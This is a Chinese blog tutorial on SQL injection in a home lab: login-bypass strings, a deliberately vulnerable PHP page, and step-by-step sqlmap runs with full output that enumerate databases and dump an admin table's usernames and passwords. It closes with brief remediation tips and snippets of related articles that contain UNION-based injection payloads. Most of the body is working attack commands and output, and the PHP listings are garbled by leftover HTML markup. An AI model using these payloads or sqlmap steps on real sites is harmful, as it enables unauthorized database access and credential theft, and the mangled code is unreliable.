sqlmap 进行sql漏洞注入

最新推荐文章于 2025-03-31 12:32:20 发布
最新推荐文章于 2025-03-31 12:32:20 发布
阅读量775 收藏 3
点赞数 1
分类专栏: 安全测试
原文链接:https://blog.youkuaiyun.com/qq_42876636/article/details/87691842
版权

有一款工具叫sqlmap主要用于识别sql漏洞并注入,这里我就写一篇教程教大家如何使用。
因为sql注入是非法的,所以我就使用两台自己的虚拟机进行测试,请大家不要在别人的网站上搞破坏。(现在大部分网站已经没有sql漏洞了,修复方法也很简单)

一、什么是sql漏洞

要搞清楚sql漏洞,首先要搞清楚sql语句。sql全称Structured Query Language(结构化查询语言),是一种编程语言,主要应用于数据库查询。一般服务器安装的数据库有Microsoft Accessmysqlpostgreysql等等。这里我使用mysql。下面我就举一些查询的例子。
SELECT * FROM admin WHERE user = "test" AND pass = "123456";
这一句就是从admin表中查找usertest并且pass123456的记录,并将满足要求的记录输出,一般登录页面就是用这条语句查询的。
但是如果我输入的密码是" OR "1"="1,用户名是test,那么sql语句岂不是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
很明显,WHERE后的表达式一定返回true,于是mysql会将每条记录都输出,而网站误以为这个用户名是正确的,然后让你以test的身份登录。
如果网站还设有管理权限,那么你可以试试密码为" OR "1"="1" AND writable = TRUE AND ""=",这样,sql查询语句就是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
其中user = "test" AND pass = "" OR "1"="1"始终返回true,所以实际条件为
writable = TRUE AND ""="",即writable = TRUE,于是mysql会将writabletrue的记录输出
还有一种,是查看文章,一般是通过GET参数id来查询的
SELECT * FROM articles WHERE id = 1;
如果网站没有对id进行校验,那么不妨用id=1 AND 1=1来测试
SELECT * FROM articles WHERE id = 1 AND 1=1;
没报错说明可能可以注入,改成id=1 AND 1=2,如果说文章没有找到,进一步说明可以注入,在改成id=",如果mysql报错,一般网站会显示出来,那么基本上就算可以注入了。
我就用这个例子进行注入

二、搭建环境

我选用的是kali linux 17.3作为攻击者,Ubuntu lts 18.04作为受害服务器,先搭建服务器,可以参考Ubuntu18.04 如何搭建Apache2+php5.6+mysql服务器,把可注入网页放在/article.php,其代码如下。

<?php

if (!isset($_GET[‘id’])){
echo ‘没有设置参数id’;
die(1);
}

h o s t < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n s i n g l e − q u o t e d − s t r i n g s t r i n g " > ′ l o c a l h o s t ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > host</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'localhost'</span><span class="token punctuation">;</span> <span class="token variable"> host</span><spanclass="tokenoperator">=</span><spanclass="tokensinglequotedstringstring">localhost</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">user = ‘test’;
p a s s < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n s i n g l e − q u o t e d − s t r i n g s t r i n g " > ′ 12345 6 ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > pass</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'123456'</span><span class="token punctuation">;</span> <span class="token variable"> pass</span><spanclass="tokenoperator">=</span><spanclass="tokensinglequotedstringstring">123456</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">conn = mysql_connect( h o s t < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > host</span><span class="token punctuation">,</span><span class="token variable"> host</span><spanclass="tokenpunctuation">,</span><spanclass="tokenvariable">user, p a s s < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n k e y w o r d " > i f < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > ! < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > pass</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable"> pass</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenkeyword">if</span><spanclass="tokenpunctuation">(</span><spanclass="tokenoperator">!</span><spanclass="tokenvariable">conn){
echo ‘无法连接至数据库’;
}

s q l < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n s i n g l e − q u o t e d − s t r i n g s t r i n g " > ′ S E L E C T ∗ F R O M w e b s i t e . a r t i c l e s W H E R E i d = ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > . < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > sql</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'SELECT * FROM website.articles WHERE id = '</span><span class="token punctuation">.</span><span class="token variable"> sql</span><spanclass="tokenoperator">=</span><spanclass="tokensinglequotedstringstring">SELECTFROMwebsite.articlesWHEREid=</span><spanclass="tokenpunctuation">.</span><spanclass="tokenvariable">_GET[‘id’]; // 漏洞就在这里
q u e r y < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n f u n c t i o n " > m y s q l q u e r y < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > query</span> <span class="token operator">=</span> <span class="token function">mysql_query</span><span class="token punctuation">(</span><span class="token variable"> query</span><spanclass="tokenoperator">=</span><spanclass="tokenfunction">mysqlquery</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">sql, c o n n < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > conn</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable"> conn</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">row = mysql_fetch_array( q u e r y < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n k e y w o r d " > i f < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > ! < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > query</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable"> query</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenkeyword">if</span><spanclass="tokenpunctuation">(</span><spanclass="tokenoperator">!</span><spanclass="tokenvariable">row){
echo ‘访问的文章不存在’;
} else {
echo $row[‘content’];
}

mysql_close($conn);

?>

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27

搭建好整个网站后,在mysql中的情形如下
mysql
mysql
mysql
当然,我注入不可能是为了看到那几篇文章,其实我通过网页也可以直接看到它,我的目的是看到一些隐私数据,比如admin表中的账号和密码

三、注入前测试

服务器地址为192.168.3.59,先访问网页查看是否可以注入。
sqlmap
sqlmap
sqlmap
显然,网页本身没有什么问题。使用id="进行测试。
sqlmap
显然mysql发现sql有语法错误,所以没有任何查询结果。
sqlmap
sqlmap
和预期完全相符,说明这个页面可以注入。

四、sqlmap注入

对于kali linuxsqlmap默认安装。
对于Ubuntu,使用apt install sqlmap进行安装
对于其他系统,到官网下载源码,sqlmap使用python编写的,所以可能需要安装python
下面开始注入。
sqlmap -u '192.168.3.59/article.php?id=1,一定要加入GET参数,不然sqlmap不知道使用什么参数去注入。输出差不多是

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:30:43

[11:30:43] [INFO] resuming back-end DBMS ‘mysql’
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL &gt;= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.3.59’

[*] shutting down at 11:30:43

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36

从上述输出来看,可以注入,下面正式开始注入。
sqlmap -u '192.168.3.59/article.php?id=1' --dbs,输出是

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:37:43

[11:37:43] [INFO] resuming back-end DBMS ‘mysql’
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL &gt;= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:
[] information_schema
[] website

[11:37:43] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.3.59’

[*] shutting down at 11:37:43

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44

注入发现两个数据库information_schemawebsite
information_schema主要是mysql数据库、表、列的信息,没有什么,website是网站的数据,对这个数据库进行注入。
sqlmap -u '192.168.3.59/article.php?id=1 -D website --tables,输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:41:14

[11:41:14] [INFO] resuming back-end DBMS ‘mysql’
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL &gt;= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: ‘website’
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website
[2 tables]
±---------+
| admin |
| articles |
±---------+

[11:41:14] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.3.59’

[*] shutting down at 11:41:14

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47

发现有两张表adminarticles,作为攻击者肯定注入admin
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns,输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:43:46

[11:43:46] [INFO] resuming back-end DBMS ‘mysql’
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL &gt;= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table ‘admin’ in database ‘website’
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: “id”,“int(11)”
[11:43:47] [INFO] retrieved: “user”,“text”
[11:43:47] [INFO] retrieved: “pass”,“text”
Database: website
Table: admin
[3 columns]
±-------±--------+
| Column | Type |
±-------±--------+
| user | text |
| id | int(11) |
| pass | text |
±-------±--------+

[11:43:47] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.3.59’

[*] shutting down at 11:43:47

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52

注入得到了三列useridpass,只要得到userpass,就能得到密码(一般是网站后台管理的登录密码)
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump,输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:47:33

[11:47:33] [INFO] resuming back-end DBMS ‘mysql’
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL &gt;= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) ‘user, pass’ for table ‘admin’ in database ‘website’
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: “test1”,“123456”
[11:47:33] [INFO] retrieved: “test2”,“123456”
[11:47:33] [INFO] retrieved: “test3”,“123456”
Database: website
Table: admin
[3 entries]
±-------±-------+
| user | pass |
±-------±-------+
| test1 | 123456 |
| test2 | 123456 |
| test3 | 123456 |
±-------±-------+

[11:47:33] [INFO] table ‘website.admin’ dumped to CSV file ‘/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv’
[11:47:33] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.3.59’

[*] shutting down at 11:47:33

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53

成功得到了管理员账号和密码,注入也就到此结束。

五、如何修复sql漏洞

就拿我这个网页漏洞距离,修复前是

<?php

if (!isset($_GET[‘id’])){
echo ‘没有设置参数id’;
die(1);
}

h o s t < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n s i n g l e − q u o t e d − s t r i n g s t r i n g " > ′ l o c a l h o s t ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > host</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'localhost'</span><span class="token punctuation">;</span> <span class="token variable"> host</span><spanclass="tokenoperator">=</span><spanclass="tokensinglequotedstringstring">localhost</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">user = ‘test’;
p a s s < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n s i n g l e − q u o t e d − s t r i n g s t r i n g " > ′ 12345 6 ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > pass</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'123456'</span><span class="token punctuation">;</span> <span class="token variable"> pass</span><spanclass="tokenoperator">=</span><spanclass="tokensinglequotedstringstring">123456</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">conn = mysql_connect( h o s t < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > , < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > host</span><span class="token punctuation">,</span><span class="token variable"> host</span><spanclass="tokenpunctuation">,</span><spanclass="tokenvariable">user, p a s s < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n k e y w o r d " > i f < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > ! < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > pass</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable"> pass</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenkeyword">if</span><spanclass="tokenpunctuation">(</span><spanclass="tokenoperator">!</span><spanclass="tokenvariable">conn){
echo ‘无法连接至数据库’;
}

s q l < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n s i n g l e − q u o t e d − s t r i n g s t r i n g " > ′ S E L E C T ∗ F R O M w e b s i t e . a r t i c l e s W H E R E i d = ′ < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > . < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > sql</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'SELECT * FROM website.articles WHERE id = '</span><span class="token punctuation">.</span><span class="token variable"> sql</span><spanclass="tokenoperator">=</span><spanclass="tokensinglequotedstringstring">SELECTFROMwebsite.articlesWHEREid=</span><spanclass="tokenpunctuation">.</span><spanclass="tokenvariable">_GET[‘id’]; // 漏洞就在这里
q u e r y < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > = < / s p a n > < s p a n c l a s s = " t o k e n f u n c t i o n " > m y s q l q u e r y < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > query</span> <span class="token operator">=</span> <span class="token function">mysql_query</span><span class="token punctuation">(</span><span class="token variable"> query</span><spanclass="tokenoperator">=</span><spanclass="tokenfunction">mysqlquery</span><spanclass="tokenpunctuation">(</span><spanclass="tokenvariable">sql, c o n n < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > conn</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable"> conn</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenvariable">row = mysql_fetch_array( q u e r y < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ) < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ; < / s p a n > < s p a n c l a s s = " t o k e n k e y w o r d " > i f < / s p a n > < s p a n c l a s s = " t o k e n p u n c t u a t i o n " > ( < / s p a n > < s p a n c l a s s = " t o k e n o p e r a t o r " > ! < / s p a n > < s p a n c l a s s = " t o k e n v a r i a b l e " > query</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable"> query</span><spanclass="tokenpunctuation">)</span><spanclass="tokenpunctuation">;</span><spanclass="tokenkeyword">if</span><spanclass="tokenpunctuation">(</span><spanclass="tokenoperator">!</span><spanclass="tokenvariable">row){
echo ‘访问的文章不存在’;
} else {
echo $row[‘content’];
}

mysql_close($conn);

?>

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27

导致sql注入的原因是使用了非法字符,那么有很多解决办法。

  • 对参数进行检查,比如检查id是否为一个整数
  • 对字符串进行转移,因为有时候不得不用到引号,php可以用addslashes函数
  • 安装现成软件(虽然我不知道是什么原理,但似乎很多网站都安装了什么D盾之类的)

六、实战

实际上,sql注入也没这么简单,有时候需要用字典去猜表名(kali自带字典),甚至还有注入不了的情况(可能是因为字典不够),即使注入成功获得密码也有可能找不到登录入口点(一般是adminlogin文件夹中),所以本文仅仅是提供一个方法不能保证注入成功,希望对大家能有帮助。

2021-09-15 sqlmap漏洞注入 加油!
weixin_48848132的博客
09-15 154
2021-09-15 sqlmap漏洞注入 数字型和字符型 数字型 整形的数据 没有闭合字符的 字符型 有闭合字符 五、爆当前数据库名 id=-1' union select 1,2,database() --+ 查询所有数据库 id=-1‘ union select 1,2,group_concat(schema_name) from information_schema.schemata -- + 六、爆表名 id=-1'union select 1,2,grou...
Python知识点:如何使用Sqlmap进行SQL注入测试
码农超哥的博客
08-09 672
Sqlmap 是一个功能非常强大的工具,适合用于自动化 SQL 注入测试。通过学习和使用各种命令和参数,你可以发现、利用并修复 SQL 注入漏洞,提升 Web 应用的安全性。
SQL注入sqlmap
最新发布
likfishdn的博客
03-31 1471
sqlmap
sqlmap查找SQL注入漏洞入门
weixin_30332705的博客
11-21 1147
1、安装sqlmap sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具sql注入点。 它由python语言开发而成,因此运行需要安装python环境。它依赖于python 2.x ,请不要安装python 3.x 1.1 安装pyhon 在Windows上安装Python ...
sql注入漏洞sqlmap使用
hmysn的博客
07-07 2281
目录什么是sql漏洞sql语言:数据库和网页用户请求的原理:sql注入原理:sql注入检测:sql注入检测工具:实例演示:漏洞防御 这边采用了皮卡丘的sql漏洞的概述: 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
SQLmap注入漏洞
qq_39122260的博客
02-16 2129
sql注入概述 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺 骗服务器执行恶意的SQL命令。它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL 语句得到一个存在安全漏洞的网站上的数据库。比如先前的很多影视网站泄露VIP会员密码大多就是 通过WEB表单递交查询字符暴的,这类表单特别容易受到SQL注入式攻击 什么是SQLmap SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性, 即对检测与利用的自动化处理(数据库指纹、访问底层文件
sqlmap注入sql漏洞测试工具,可以通过该工具测试进行漏洞修补
12-23
在标题和描述中提到的,这个工具可以用于测试SQL漏洞,并辅助进行修复工作。 在SQL注入攻击中,攻击者通过构造恶意的SQL语句,利用网站输入验证不严的漏洞,来获取或篡改数据库中的敏感信息。SQLMap的工作原理是...
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1985
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库功能sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
SQL注入漏洞sqlmap自动注入
XZZbh的博客
09-19 681
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
在kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 6576
安全等级调为low进入SQL Injection(Blind)页面。
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
SQL注入+sqlmap使用
07-04
SQL注入+sqlmap使用SQL注入+sqlmap使用SQL注入+sqlmap使用
sqlmap注入漏洞
weixin_56709770的博客
04-15 131
布尔盲 时间盲
使用SQLMap进行SQL注入测试
聚娃科技开发者博客
06-28 697
